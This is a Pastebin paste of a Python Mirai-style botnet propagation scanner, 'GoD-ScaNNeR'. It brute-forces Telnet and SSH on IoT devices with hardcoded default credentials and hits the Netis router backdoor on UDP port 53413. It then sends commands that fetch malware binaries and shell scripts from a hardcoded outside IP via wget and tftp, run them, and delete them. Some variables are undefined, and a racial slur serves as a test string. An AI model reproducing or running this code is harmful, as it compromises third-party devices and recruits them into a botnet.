API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 25th, 2017
256
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.86 KB | None | 0 0
raw download clone embed print report
  1. @@ -0,0 +1,211 @@
  2. +#!/usr/bin/python
  3. +"""
  4. + GoD-ScaNNeR(NeTiS/TeLNeT/SSH)
  5. + By; LiGhT
  6. +"""
  7. +import threading, sys, time, random, socket, re, os, paramiko
  8. +from Queue import *
  9. +from sys import stdout
  10. +
  11. +if len(sys.argv) < 3:
  12. + print "Usage: python "+sys.argv[0]+" <threads> <list>"
  13. + sys.exit()
  14. +
  15. +# USER AND PASS LISTS #
  16. +usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  17. +passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  18. +ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  19. +loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  20. +
  21. +
  22. +# START CONFIGURATION #
  23. +urlz = "http://185.29.11.197 /tftp" # ARM4 Binary
  24. +sh = "http://185.29.11.197 /bins.sh" # SH File
  25. +command = "AA\x00\x00AAAA cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.29.11.197 /bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.29.11.197 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.29.11.197 ; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh\x00" # MIPSEL Binary
  26. +
  27. +# DONT TOUCH
  28. +spawn_shell = "cat | sh"
  29. +paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  30. +threads = int(sys.argv[1])
  31. +ips = open(sys.argv[2], "r").readlines()
  32. +ports = ["23", "22", "53413"]
  33. +queue = Queue()
  34. +qcount = 0
  35. +binary = url.split("/")
  36. +binary = binary[3]
  37. +ip = binary[2]
  38. +found = 0
  39. +count = 0
  40. +
  41. +for ip in ips:
  42. + qcount += 1
  43. + stdout.write("\r[%d] Added to queue" % qcount)
  44. + stdout.flush()
  45. + queue.put(ip)
  46. +print "\n"
  47. +
  48. +def readUntil(tn, string, timeout=10):
  49. + buf = ''
  50. + start_time = time.time()
  51. + while time.time() - start_time < timeout:
  52. + buf += tn.recv(1024)
  53. + time.sleep(0.01)
  54. + if string in buf: return buf
  55. + raise Exception('TIMEOUT!')
  56. +
  57. +def worker():
  58. + try:
  59. + while True:
  60. + try:
  61. + if queue.empty() == True:
  62. + sys.exit(1)
  63. + ip = queue.get()
  64. + ss = sssh(ip)
  65. + ss.start()
  66. + tt = ttelnet(ip)
  67. + tt.start()
  68. + nn = nnetis(ip)
  69. + nn.start()
  70. + queue.task_done()
  71. + except:
  72. + pass
  73. + except:
  74. + pass
  75. +
  76. +class ttelnet(threading.Thread):
  77. + def __init__ (self, ip):
  78. + threading.Thread.__init__(self)
  79. + self.ip = str(ip).rstrip('\n')
  80. + def run(self):
  81. + try:
  82. + tn = socket.socket()
  83. + tn.settimeout(5)
  84. + tn.connect((self.ip,23))
  85. + time.sleep(0.2)
  86. + hoho = ''
  87. + hoho += readUntil(tn, ":")
  88. + if "mdm9625" in hoho:
  89. + r00t = 0
  90. + username = usernames[1]
  91. + password = passwords[1]
  92. + tn.send(username + "\n")
  93. + elif "9615-cdp" in hoho:
  94. + r00t = 1
  95. + username = usernames[0]
  96. + password = passwords[0]
  97. + tn.send(username + "\n")
  98. + elif "ogin" in hoho and "9615-cdp" not in hoho:
  99. + zte = 1
  100. + username = usernames[2]
  101. + password = passwords[2]
  102. + tn.send(username + "\n")
  103. + elif "ogin" in hoho and "mdm9625" not in hoho:
  104. + zte = 1
  105. + username = usernames[2]
  106. + password = passwords[2]
  107. + tn.send(username + "\n")
  108. + if "(none)" in hoho:
  109. + zte = 0
  110. + vizxv = 1
  111. + username = usernames[3]
  112. + password = passwords[3]
  113. + tn.send(username + "\n")
  114. + if "BCM" in hoho:
  115. + zte = 0
  116. + vizxv = 0
  117. + BCM = 1
  118. + username = usernames[1]
  119. + password = passwords[1]
  120. + tn.send(username + "\n")
  121. + except Exception:
  122. + tn.close()
  123. + try:
  124. + hoho = ''
  125. + hoho += readUntil(tn, ":")
  126. + if "assword" in hoho:
  127. + tn.send(password + "\n")
  128. + time.sleep(3)
  129. + except Exception:
  130. + tn.close()
  131. + try:
  132. + mp = ''
  133. + mp += tn.recv(1024)
  134. + if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  135. + if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  136. + if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  137. + if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138. + if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  139. + if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  140. + except Exception:
  141. + tn.close()
  142. + pass
  143. +
  144. +class nnetis(threading.Thread):
  145. + def __init__ (self, ip):
  146. + threading.Thread.__init__(self)
  147. + self.ip = str(ip).rstrip('\n')
  148. + def run(self):
  149. + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  150. + try:
  151. + # sends netis payload to almost everything lmao
  152. + s.sendto(loginpayload, (self.ip, 53413))
  153. + time.sleep(1)
  154. + s.sendto(commandpayload, (self.ip, 53413))
  155. + time.sleep(2)
  156. + except Exception:
  157. + pass
  158. +
  159. +class sssh(threading.Thread):
  160. + def __init__ (self, ip):
  161. + threading.Thread.__init__(self)
  162. + self.ip = str(ip).rstrip('\n')
  163. + def run(self):
  164. + x = 1
  165. + while x != 0:
  166. + try:
  167. + username='root'
  168. + password="0"
  169. + port = 22
  170. + ssh = paramiko.SSHClient()
  171. + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  172. + dobreak=False
  173. + for passwd in ssh_passwords:
  174. + if ":n/a" in passwd:
  175. + password=""
  176. + else:
  177. + password=passwd.split(":")[1]
  178. + if "n/a:" in passwd:
  179. + username=""
  180. + else:
  181. + username=passwd.split(":")[0]
  182. + try:
  183. + ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  184. + dobreak=True
  185. + break
  186. + except:
  187. + pass
  188. + if True == dobreak:
  189. + break
  190. + badserver=True
  191. + stdin, stdout, stderr = ssh.exec_command("echo nigger")
  192. + output = stdout.read()
  193. + if "nigger" in output:
  194. + badserver=False
  195. + if badserver == False:
  196. + print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  197. + ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  198. + time.sleep(3)
  199. + ssh.close()
  200. + if badserver == True:
  201. + ssh.close()
  202. + except:
  203. + pass
  204. + x = 0
  205. +
  206. +for g in xrange(threads):
  207. + t = threading.Thread(target=worker)
  208. + t.setDaemon(True)
  209. + t.start()
  210. +
  211. +queue.join()
  212. +print "Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!